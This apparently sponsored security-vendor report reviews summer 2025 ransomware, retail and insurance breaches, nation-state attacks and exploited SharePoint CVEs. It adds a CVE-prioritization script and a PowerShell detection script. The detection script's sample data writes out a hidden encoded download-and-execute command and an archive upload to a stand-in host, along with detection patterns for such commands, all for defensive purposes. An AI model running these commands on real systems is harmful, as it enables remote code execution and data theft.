Summer 2025 wasn't just hot; it was relentless.
Ransomware hammered hospitals, retail giants suffered data breaches, insurance companies were hit by phishing, and nation-state actors launched disruptive campaigns.
From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels.
This report breaks down the season's most high-impact incidents and what security teams need to do before the next wave hits.
Summer Exposes Healthcare's Rising Ransomware Risk
Hospitals can't afford downtime, and attackers know it.
This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.
Interlock rises as a major threat to US healthcare
A July 22, 2025, joint advisory by CISA, FBI, and HHS highlighted Interlock as a major threat to the Healthcare and Public Health (HPH) sector. The group is linked to around 14 incidents in 2025 alone, a third of which affected healthcare providers.
What sets Interlock apart is its use of "FileFix," a PowerShell launcher that hides malicious scripts behind decoy file paths. It tricks users into running payloads through File Explorer, bypassing typical security detections.
Rhysida ransomware targeted another US healthcare center
On July 8, 2025, the Rhysida ransomware group allegedly leaked sensitive data from Florida Hand Center, including medical images, driver's licenses, and insurance forms.
The clinic, which serves patients in Punta Gorda, Port Charlotte, and Fort Myers, was given just seven days to respond before the release.
Qilin recycles Scattered Spider playbook in wave of healthcare breaches
In June 2025, Qilin became the most active ransomware group, recording 81 victims, 52 of them in the healthcare sector.
The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to gain access, deploy ransomware, and exfiltrate sensitive data such as EHRs and insurance records.
To maximize pressure, Qilin went beyond encryption, leveraging legal-themed extortion tactics like a "Call Lawyer" feature and automated negotiation tools to drive faster payouts.
Proactively test and validate your security controls against Summer 2025's most impactful threats, including Interlock, Qilin, DragonForce, Scattered Spider, and ToolShell, with the Picus Security Validation Platform.
Start your 14-day free trial now and discover your readiness in minutes.
Major Brands Breached in Retail Cybercrime Wave
The retail sector could not escape the wave of cyberattacks sweeping through Summer 2025.
Louis Vuitton breach marks third in a quarter
On July 2, 2025, Louis Vuitton UK suffered a data breach exposing customer contact details and purchase history, its third LVMH brand breach in three months after Dior and LV Korea.
Days later, on July 10, UK police arrested four suspects tied to high-profile attacks on M&S, Co-op, and Harrods.
The group is allegedly linked to Scattered Spider, a domestic threat actor known for social engineering and collaboration with ransomware operators like DragonForce, signaling the growing influence of homegrown cybercriminals on major retailers.
DragonForce hits US retail chain Belk
Between May 7 and 11, 2025, on the other side of the Atlantic, North Carolina-based retailer Belk suffered a data breach.
DragonForce claimed responsibility, stating it exfiltrated 156 GB of customer and employee data, including names, Social Security numbers, emails, order histories, and HR files, which were later posted on its leak site after ransom negotiations stalled.
DragonForce, first emerging in late 2023, operates as a ransomware-as-a-service cartel, listing roughly 136 victims by March 2025, many of them US and UK retail organizations.
Scattered Spider's tactics have shifted from retail to insurance
Scattered Spider (UNC3944), a native English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, help-desk impersonation, and typosquatted domains to breach UK retailers (M&S, Co-op, Harrods) in April–May 2025.
In mid-June 2025, researchers flagged that Scattered Spider (UNC3944) had shifted from retail to targeting US insurance companies.
- Aflac detected and contained unauthorized access on June 12, 2025; customer and employee personal data (including SSNs and health claims) may have been compromised.
- Erie Insurance and Philadelphia Insurance Companies also reported similar cyber disruptions in early to mid-June, resulting in operational downtime.
The intrusions matched Scattered Spider's known tactical profile, though no ransomware was deployed, and systems remained operational.
State-Sponsored and Geopolitical Cyber Activity
Not all cyber threats this summer were about money.
Nation-state hackers and hacktivists also made their mark, using the turbulent geopolitical climate to launch attacks.
- June 14–17, 2025: Pro-Israel hacktivist group Predatory Sparrow hit Iran's Bank Sepah, disrupting banking services, then destroyed ~$90M in crypto by breaching Nobitex and sending tokens to burn wallets.
- June 30, 2025: The US Department of Homeland Security and CISA issued a joint alert warning of impending Iranian cyber retaliation targeting critical infrastructure in the US and Europe.
These incidents serve as a stark reminder that cyber conflict is now a frontline extension of geopolitical tension, one that can ripple far beyond borders and sectors.
Key Vulnerabilities Gaining Public Attention
Several Microsoft SharePoint vulnerabilities were exploited this summer in a widespread cyber espionage campaign known as ToolShell.
- CVE-2025-53770 is a critical remote code execution flaw allowing unauthenticated attackers to run arbitrary code on vulnerable on-prem SharePoint servers. Threat actors used it to deploy web shells, steal credentials, and move laterally through enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025.
- CVE-2025-49704 and CVE-2025-49706 were also added to the KEV on July 22 after being abused in chained attacks. The pair enables authentication bypass and code injection, allowing attackers to exploit unpatched SharePoint systems even when earlier fixes were applied.
The ToolShell campaign targeted organizations across the US, Europe, and the Middle East, including government agencies, energy companies, and telecom providers.
Security researchers say the attackers likely reverse-engineered Microsoft's July Patch Tuesday fixes to develop the bypass used in CVE-2025-53770.
What to Take from the Summer Wildfires in Cybersecurity?
From hospitals to retail giants and insurance providers to nation-states, the season exposed cracks in even the most fortified environments.
Here's what security teams should do next.
Patch like your life depends on it, because in critical sectors, lives do.
Start with CISA KEV entries and high-severity CVEs, but don't stop there. Ask the harder question: are you the kind of target that attackers go after?
Validate whether each CVE is actually exploitable in your environment.
Focus on exploit chains, not just the scores. That is what adversaries are doing.
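To make that prioritization concrete, here is an added example (not part of this report and not Picus product code) that ranks open CVEs per host by combining a KEV-style feed, whether the chained SharePoint bugs are both present on the same host, ransomware use, and internet exposure. The feed records, host inventory, and severity numbers are constructed for illustration; the field names are modeled on CISA's KEV JSON feed, and the CVE identifiers are the ones this report names.

```python
"""Rank open CVEs by KEV status, known exploit chains, and local exposure.

Added example; the feed, inventory and severity values below are constructed.
Field names (cveID, product, knownRansomwareCampaignUse) follow the shape of
CISA's KEV JSON feed as an assumption; replace the inline data with real exports.
"""
from dataclasses import dataclass

# Constructed KEV-style records. Ransomware flags reflect this report's narrative
# (Qilin used the Fortinet bugs for ransomware; ToolShell was espionage).
KEV_FEED = {
    "vulnerabilities": [
        {"cveID": "CVE-2025-53770", "product": "SharePoint", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-49704", "product": "SharePoint", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-49706", "product": "SharePoint", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-21762", "product": "FortiOS", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2024-55591", "product": "FortiOS", "knownRansomwareCampaignUse": "Known"},
    ]
}

# Constructed severity numbers (hypothetical, not official CVSS values).
SEVERITY = {
    "CVE-2025-53770": 9.8, "CVE-2025-49704": 8.8, "CVE-2025-49706": 6.5,
    "CVE-2024-21762": 9.8, "CVE-2024-55591": 9.8,
}

# Chains the report describes: the two SharePoint bugs were abused together.
CHAINS = [("CVE-2025-49706", "CVE-2025-49704")]


@dataclass(frozen=True)
class Asset:
    name: str
    product: str
    internet_exposed: bool
    unpatched: tuple  # CVE IDs still open on this host


# Constructed inventory (hypothetical hostnames).
ASSETS = [
    Asset("sp-web-01", "SharePoint", True, ("CVE-2025-53770", "CVE-2025-49704", "CVE-2025-49706")),
    Asset("sp-intranet-02", "SharePoint", False, ("CVE-2025-49704",)),
    Asset("fw-edge-01", "FortiOS", True, ("CVE-2024-55591",)),
]


def kev_index(feed):
    """Map cveID -> KEV record for quick lookup."""
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def score_asset(asset, kev):
    """Return (score, cve, reasons) for each open CVE on one host."""
    results = []
    for cve in asset.unpatched:
        score = SEVERITY.get(cve, 5.0)
        reasons = []
        entry = kev.get(cve)
        if entry:
            score += 3
            reasons.append("in KEV")
            if entry.get("knownRansomwareCampaignUse") == "Known":
                score += 2
                reasons.append("ransomware use known")
        if asset.internet_exposed:
            score += 2
            reasons.append("internet-exposed")
        # A chain only matters if every link is still open on this host.
        for chain in CHAINS:
            if cve in chain and all(c in asset.unpatched for c in chain):
                score += 2
                reasons.append("completes chain " + "+".join(chain))
                break
        results.append((round(score, 1), cve, reasons))
    return results


def prioritize(assets, feed):
    """Flatten per-host scores into one list, highest priority first.

    CVEs that are in KEV but absent from the inventory never appear: they are
    not applicable to this environment, which is the report's 'validate' point.
    """
    kev = kev_index(feed)
    rows = []
    for asset in assets:
        for score, cve, reasons in score_asset(asset, kev):
            rows.append({"asset": asset.name, "cve": cve, "score": score, "reasons": reasons})
    rows.sort(key=lambda r: (-r["score"], r["asset"], r["cve"]))
    return rows


if __name__ == "__main__":
    for row in prioritize(ASSETS, KEV_FEED):
        print(f'{row["score"]:5.1f}  {row["asset"]:15} {row["cve"]}  {", ".join(row["reasons"])}')
```

Presence in the inventory is only a proxy for exploitability; the report's advice is to confirm it by exercising the control path, so treat this ranking as the order in which to run those validations, not as a substitute for them.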
Harden identity as your new perimeter.
Social engineering worked better than malware this summer. Stop MFA fatigue attacks, reinforce help-desk verification, and restrict privileged access.
Train your people, because they were the breach point.
Scattered Spider and others didn't exploit a CVE; they exploited a person. Run regular simulations, update phishing scenarios, and prepare high-risk roles for real-world lures.
Watch for what happens after initial access.
Threat actors like Interlock and Qilin didn't just drop ransomware; they moved laterally, staged data, and evaded detection. Implement behavioral monitoring for techniques such as PowerShell abuse, credential theft, and stealthy exfiltration.
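As an added illustration of that kind of behavioral monitoring (example code, not from this report or from Picus), the following scans constructed PowerShell command-line telemetry for encoded commands, in-memory download cradles, hidden-window launches from File Explorer (the FileFix pattern described above), and an archive-then-upload sequence by the same user within a short window. The event fields, hostnames, usernames, and placeholder.invalid addresses are all made up.

```python
"""Behavioral checks over PowerShell command-line telemetry.

Added example. SAMPLE_EVENTS is constructed inline in a hypothetical shape
(ts, host, user, parent, cmdline); a real pipeline would feed it from process
creation or script block logging exports.
"""
import base64
import re
from datetime import datetime, timedelta


def _enc(cmd: str) -> str:
    # -EncodedCommand takes base64 of UTF-16LE text; used only to build sample data.
    return base64.b64encode(cmd.encode("utf-16le")).decode()


# Constructed sample events: one hidden encoded launch from Explorer, a staging
# step, an upload two minutes later, and a benign build-server script run.
SAMPLE_EVENTS = [
    {"ts": "2025-07-08T09:00:00", "host": "ws-017", "user": "jdoe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')")},
    {"ts": "2025-07-08T09:05:00", "host": "ws-017", "user": "jdoe", "parent": "powershell.exe",
     "cmdline": "powershell.exe -c Compress-Archive -Path C:\\Users\\jdoe\\Documents -DestinationPath C:\\Windows\\Temp\\d.zip"},
    {"ts": "2025-07-08T09:07:00", "host": "ws-017", "user": "jdoe", "parent": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest -Uri https://placeholder.invalid/up -Method Post -InFile C:\\Windows\\Temp\\d.zip"},
    {"ts": "2025-07-08T10:00:00", "host": "srv-build", "user": "svc-ci", "parent": "cmd.exe",
     "cmdline": "powershell.exe -File C:\\build\\deploy.ps1 -Verbose"},
]

# In-memory execution markers typical of download cradles.
CRADLE = re.compile(r"(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b)")
# Flags that hide the window or disable profile/policy; rarely used by admins interactively.
EVASION = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass)")
# -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"(?i)-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Data staging (archive creation) and outbound upload cmdlets.
ARCHIVE = re.compile(r"(?i)Compress-Archive|\b(7z|rar)\s+a\s")
UPLOAD = re.compile(r"(?i)(Invoke-WebRequest|Invoke-RestMethod|curl)[^\n]*(-Method\s+Post|-InFile\b)")


def decode_encoded(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Per-event findings; the decoded script is inspected alongside the raw command line."""
    findings = []
    text = ev["cmdline"]
    decoded = decode_encoded(text)
    if decoded is not None:
        findings.append("encoded command")
        text = text + " " + decoded
    if CRADLE.search(text):
        findings.append("download cradle")
    evasive = EVASION.search(text) is not None
    if evasive:
        findings.append("evasion flags")
    if evasive and ev["parent"].lower() == "explorer.exe":
        findings.append("hidden PowerShell launched from File Explorer")
    return findings


def correlate_staging(events, window_minutes=10):
    """Flag an archive step followed by an upload from the same host/user inside the window."""
    alerts, last_archive = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["user"])
        t = datetime.fromisoformat(ev["ts"])
        if UPLOAD.search(ev["cmdline"]):
            if key in last_archive and t - last_archive[key] <= timedelta(minutes=window_minutes):
                alerts.append({"host": ev["host"], "user": ev["user"], "ts": ev["ts"],
                               "finding": "data staged then uploaded"})
        elif ARCHIVE.search(ev["cmdline"]):
            last_archive[key] = t
    return alerts


def run_detections(events):
    """Return per-event hits plus cross-event staging alerts."""
    hits = [{"ts": e["ts"], "host": e["host"], "user": e["user"], "findings": analyze_event(e)}
            for e in events]
    return {"events": [h for h in hits if h["findings"]], "staging": correlate_staging(events)}


if __name__ == "__main__":
    result = run_detections(SAMPLE_EVENTS)
    for hit in result["events"]:
        print(hit["ts"], hit["host"], hit["user"], "; ".join(hit["findings"]))
    for alert in result["staging"]:
        print(alert["ts"], alert["host"], alert["user"], alert["finding"])
```

The per-event rules catch the noisy cases; the correlation step is what turns two individually plausible commands (compressing a folder, posting a file) into the staging-then-exfiltration behavior the report warns about. Tune the window and the allow-list of parents (build agents, deployment tooling) to your own baseline before alerting on it.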
Don't ignore legacy systems and overlooked infrastructure.
The ToolShell campaign exploited unpatched on-prem SharePoint servers, many running unsupported or outdated versions.
Whether it's aging on-prem SharePoint, appliances, or unmonitored legacy equipment, isolate what you can't upgrade, monitor what you can't patch, and replace what you've ignored.
We strongly suggest simulating the attacks mentioned above to test the effectiveness of your security controls against real-life cyberattacks using the Picus Security Validation Platform.
You can also test your defenses against hundreds of other malware and exploitation campaigns, such as Medusa, Rhysida, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.
Sponsored and written by Picus Security.